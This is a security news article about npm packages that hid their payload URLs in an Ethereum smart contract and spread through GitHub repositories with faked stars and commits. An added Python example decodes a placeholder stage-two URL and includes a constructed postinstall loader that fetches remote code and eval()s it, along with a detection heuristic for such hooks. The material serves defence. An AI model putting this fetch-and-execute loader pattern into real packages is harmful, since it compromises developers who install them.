A newly documented malware campaign shows cybercriminals finding a novel way to evade traditional security measures. Researchers at ReversingLabs found threat actors using Ethereum smart contracts to hide the URLs of their malicious payloads, a technique that makes the delivery infrastructure durable and hard to detect with conventional scanning. The finding marks a notable evolution in software supply chain attacks.
The Hidden Threat in Your Code
Typically, malicious software packages contain suspicious URLs or scripts within their own files, which security scanners are designed to flag. In this attack the hackers took a different route. Two npm packages, “colortoolv2” and “mimelib2,” served only as “dumb downloaders.” Rather than embedding the malicious code or a hard-coded download URL, the packages contained code that, once installed, queried an Ethereum smart contract and read from it the location of the next-stage malware. Because that pointer lives on a public, decentralized ledger rather than on a server the attackers rent, it cannot be taken down by a hosting provider or registry, and a static scan of the package sees neither the URL nor the payload.
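To make the mechanism concrete, here is an added example (not ReversingLabs’ analysis code and not the colortoolv2/mimelib2 loader itself). It shows two sides of the behaviour described above: how a loader would turn an `eth_call` reply into a stage-two URL by ABI-decoding the returned string, and a defender-side heuristic that flags an npm package whose install hook both talks to a chain RPC endpoint and fetches or executes something. The contract address, RPC endpoint, function selector, stage-two URL and package contents are all constructed for illustration and are assumptions, not values from the campaign.

```python
"""Added example: not ReversingLabs' code and not the malicious packages' code.
All addresses, endpoints, selectors, URLs and package contents are constructed."""
import json
import re

# ---- 1. loader side: the eth_call request and the ABI-decoded string result ----

def build_eth_call(contract: str, selector_hex: str, rpc_id: int = 1) -> dict:
    """JSON-RPC body a loader would POST to read a view function on `contract`.
    A real selector is keccak256(signature)[:4]; it is passed in rather than
    computed here, and the value used in __main__ is a placeholder (assumption)."""
    return {
        "jsonrpc": "2.0",
        "id": rpc_id,
        "method": "eth_call",
        "params": [{"to": contract, "data": selector_hex}, "latest"],
    }

def abi_decode_string(result_hex: str) -> str:
    """Decode the `result` of eth_call for a function returning a single `string`.
    ABI layout: word 0 = byte offset of the data, then a 32-byte length word,
    then the UTF-8 bytes right-padded with zeros to a multiple of 32 bytes."""
    raw = bytes.fromhex(result_hex[2:] if result_hex.startswith("0x") else result_hex)
    if len(raw) < 64:
        raise ValueError("too short for an ABI-encoded string")
    offset = int.from_bytes(raw[0:32], "big")
    length = int.from_bytes(raw[offset:offset + 32], "big")
    start = offset + 32
    if start + length > len(raw):
        raise ValueError("declared length runs past the payload")
    return raw[start:start + length].decode("utf-8")

# Constructed eth_call `result` (not a real on-chain value): three 32-byte words
# encoding the string "http://192.0.2.10/s2.js" (23 bytes, 0x17).
STAGE2_RESULT = (
    "0x"
    + "20".rjust(64, "0")                                          # offset 0x20
    + "17".rjust(64, "0")                                          # length 23
    + "687474703a2f2f3139322e302e322e31302f73322e6a73".ljust(64, "0")  # bytes + pad
)

def stage2_url_from_response(response_json: str) -> str:
    """What the downloader does with the RPC reply before fetching the payload."""
    return abi_decode_string(json.loads(response_json)["result"])

# ---- 2. defender side: flag install hooks that do a chain lookup and a fetch ----

INSTALL_HOOKS = ("preinstall", "install", "postinstall")
CHAIN_MARKERS = ("eth_call", "JsonRpcProvider", "ethers", "web3")
FETCH_MARKERS = ("fetch(", "https.get", "http.get", "axios", "child_process", "eval(")

def flag_install_time_chain_lookup(package_json: str, sources: dict) -> list:
    """Return one finding per install hook whose script both reaches a chain RPC
    and fetches/executes. `sources` maps script filenames to their text. This is
    a coarse string heuristic; it is meant to surface packages for manual review."""
    scripts = json.loads(package_json).get("scripts", {})
    findings = []
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        m = re.search(r"node\s+(\S+\.js)", cmd)          # resolve `node foo.js`
        src = sources.get(m.group(1), "") if m else cmd  # else inspect the command itself
        chain = [k for k in CHAIN_MARKERS if k in src]
        fetch = [k for k in FETCH_MARKERS if k in src]
        if chain and fetch:
            findings.append(f"{hook} ({cmd}): chain markers {chain}, fetch/exec markers {fetch}")
    return findings

# Constructed package contents modelled on the loader behaviour described above.
SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "example-colorlib", "version": "1.0.0",
    "scripts": {"postinstall": "node setup.js"},
})
SAMPLE_SOURCES = {
    "setup.js": (
        'const { ethers } = require("ethers");\n'
        'const p = new ethers.JsonRpcProvider("https://rpc.invalid");\n'
        'const c = new ethers.Contract("0x000000000000000000000000000000000000dEaD",\n'
        '    ["function getUrl() view returns (string)"], p);\n'
        'c.getUrl().then(u => fetch(u)).then(r => r.text()).then(src => eval(src));\n'
    ),
}

if __name__ == "__main__":
    print(build_eth_call("0x000000000000000000000000000000000000dEaD", "0x00000000"))
    print(stage2_url_from_response(json.dumps({"jsonrpc": "2.0", "id": 1, "result": STAGE2_RESULT})))
    for f in flag_install_time_chain_lookup(SAMPLE_PACKAGE_JSON, SAMPLE_SOURCES):
        print("FLAG:", f)
```

The point of the decoder is that the URL never appears as a string literal anywhere in the package; it only exists after a network round trip, which is exactly why a scanner looking for suspicious URLs in the files finds nothing. The heuristic therefore keys on the combination of an install-time lifecycle hook, chain RPC usage, and a fetch-then-execute pattern rather than on any particular URL or contract address.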
A Fabricated World of Legitimacy
The packages were not distributed at random. ReversingLabs’ investigation revealed they were part of a larger deception campaign on GitHub. The malicious npm packages were concealed in repositories masquerading as legitimate cryptocurrency trading bots, with names like ‘solana-trading-bot-v2’ and ‘hyperliquid-trading-bot-v2.’ To lend the repositories credibility, the attackers used a coordinated network of fake accounts to manufacture the signals developers use to judge trust, such as stars and commits.
This network has been linked to a group called ‘Stargazer’s Ghost Network.’ Together, the accounts artificially inflated the apparent credibility of the repositories: they created fake commits and stars and posed as legitimate maintainers so that the projects appeared to have genuine interest and a community behind them. This social engineering was aimed at developers searching for open-source cryptocurrency tools, who would mistake such activity for real community support.
The Elusive Nature of the Threat
The attackers built in redundancy to survive detection. When “colortoolv2” was detected and removed from npm, they published a functionally identical package under a new name, “mimelib2,” and continued the campaign with little disruption. Using a public blockchain for command and control is likewise a deliberate choice: the smart contract cannot be taken down by any hosting provider or registry, yet the attackers can update the URL it returns whenever a payload host is blocked, which gives them a robust and resilient C2 framework. The practical consequence for defenders is that blocking a single URL achieves little; what can be detected is the behaviour, namely a package that contacts a chain RPC endpoint at install time and then fetches and runs whatever it is pointed at.
Evolving Tactics in a Growing Threat Landscape
This finding is part of a broader trend of increasingly serious software supply chain attacks; the researchers noted 23 supply chain incidents in the cryptocurrency space in 2024 alone. These attacks show cybercriminals continually finding new ways to abuse trusted platforms. Past incidents have included using trusted services such as Google Drive and GitHub Gist to mask malicious C2 servers, and compromising well-known packages on registries such as PyPI.
A Call for Increased Vigilance
The findings emphasize that open-source libraries must be used with care in development work. Developers cannot rely on traditional social indicators of a package’s legitimacy, such as the number of stars a repository has or its commit count, since both can be manufactured. Experts agree that developers need to analyze any library or package before adopting it, including what its install scripts do. As the threat landscape expands, so must our approach to security. This use of blockchain technology shows that threat actors are becoming increasingly elusive and inventive, and is a stark reminder that due diligence is more important than ever.